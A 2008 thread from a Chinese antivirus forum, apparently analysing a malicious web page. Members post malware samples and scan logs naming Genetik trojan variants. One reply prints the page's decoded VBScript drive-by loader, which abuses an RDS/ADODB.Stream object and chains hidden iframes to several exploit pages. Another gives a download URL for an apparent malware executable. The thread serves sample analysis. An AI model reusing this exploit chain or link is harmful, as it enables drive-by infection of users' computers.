查看: 3241|回复: 12
收起左侧

[已鉴定] 毒网

 关闭 [复制链接]
moonsilver
发表于 2008-1-25 14:09:25 | 显示全部楼层 |阅读模式
tonger2003
发表于 2008-1-25 14:15:00 | 显示全部楼层
Microsoft.rar (3.33 KB, 下载次数: 240)
冷冷
发表于 2008-1-25 14:23:08 | 显示全部楼层

I:\virus\test\Microsoft.com - Suspect code-parts found (Level: 160)

        1 File scanned
          (0 Archives with 0 files)
        0 Signatures found
        1 Suspect code-part found
        Used time: 0:00.000
1.PNG

SAMPLE-12.rar (204.16 KB, 下载次数: 290)
llgiggs
头像被屏蔽
发表于 2008-1-25 14:27:56 | 显示全部楼层




[ 本帖最后由 llgiggs 于 2008-1-25 14:29 编辑 ]
1.PNG
solcroft
发表于 2008-1-25 14:34:43 | 显示全部楼层
opera0day... mcafee_exploit... 名字取得够牛的
  1. <html>

  2. <script language=VBScript>

  3. on error resume next

  4. set server = document.createElement("object")

  5. server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"

  6. set File = server.createobject(Adodb.Stream,"")

  7. if Not Err.Number = 0 then

  8. err.clear

  9. document.write ("<iframe src=06014.htm width=100% height=100% scrolling=no frameborder=0>")

  10. document.write ("<iframe src=baidu.htm width=100% height=100% scrolling=no frameborder=0>")

  11. document.write ("<iframe src=cookie.htm width=100% height=100% scrolling=no frameborder=0>")

  12. document.write ("<iframe src=jet.htm width=100% height=100% scrolling=no frameborder=0>")

  13. document.write ("<iframe src=McAfee_exploit.html width=100% height=100% scrolling=no frameborder=0>")

  14. document.write ("<iframe src=opera0day.htm width=100% height=100% scrolling=no frameborder=0>")

  15. document.write ("<iframe src=qvod.htm width=100% height=100% scrolling=no frameborder=0>")

  16. document.write ("<iframe src=realplay_071122_exp.html width=100% height=100% scrolling=no frameborder=0>")

  17. document.write ("<iframe src=xunleikankan.html width=100% height=100% scrolling=no frameborder=0>")

  18. end if

  19. </script>

  20. </html>
复制代码
kkgh
发表于 2008-1-25 14:48:37 | 显示全部楼层
已扫描的磁盘,文件夹及文件:C:\Documents and Settings\zh\桌面\SAMPLE-12.rar
C:\Documents and Settings\zh\桌面\SAMPLE-12.rar >>RAR >>setup.exe - 可能是 Win32/Genetik 木马 的一个变种
C:\Documents and Settings\zh\桌面\SAMPLE-12.rar >>RAR >>setup_unpacked.exe - 可能是 Win32/Genetik 木马 的一个变种
C:\Documents and Settings\zh\桌面\SAMPLE-12.rar - 可能是 Win32/Genetik 木马 的一个变种 - 已隔离 - 已删除
已扫描的文件数目:3
已发现的病毒数目:2
已清除病毒的文件数目:1
完成时间: 14:53:18 总扫描时间:2 秒 (00:00:02)
mofunzone
发表于 2008-1-25 14:48:44 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\Microsoft.rar'
C:\Documents and Settings\Administrator\My Documents\
  Microsoft.rar
    [0] Archive type: RAR
      --> Microsoft.com
        [1] Archive type: Runtime Packed
        --> Object
      [WARNING]   The file was ignored!
  Microsoft.rar:Zone.Identifier


End of the scan: 2008年1月24日  22:47
Used time: 00:05 min

The scan has been done completely.

      0 Scanning directories
      3 Files were scanned
      0 viruses and/or unwanted programs were found
      1 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      3 Files not concerned
      1 Archives were scanned
      1 Warnings
      0 Notes
tanlimo
发表于 2008-1-25 14:52:14 | 显示全部楼层
很想知道解密过程,而不是结果。

http://caob521.3322.org/down/lz.exe

[ 本帖最后由 tanlimo 于 2008-1-25 15:57 编辑 ]

lz.rar

2.21 KB, 下载次数: 251

傻猪猪米走鸡
发表于 2008-1-25 15:27:16 | 显示全部楼层
E:\virus\Microsoft.rar » RAR » Microsoft.com » FSG v2.0 - is OK
E:\virus\SAMPLE-12.rar » RAR » setup.exe - probably a variant of Win32/Genetik trojan - was a part of the deleted object
E:\virus\SAMPLE-12.rar » RAR » setup_unpacked.exe - probably a variant of Win32/Genetik trojan - was a part of the deleted object
E:\virus\SAMPLE-12.rar - probably a variant of Win32/Genetik trojan - deleted - quarantined
傻猪猪米走鸡
发表于 2008-1-25 15:28:51 | 显示全部楼层
2008-1-25 15:33:28        Kernel        File  'E:\virus\Microsoft.rar' was sent to ESET for analysis.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 17:39 , Processed in 0.153293 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表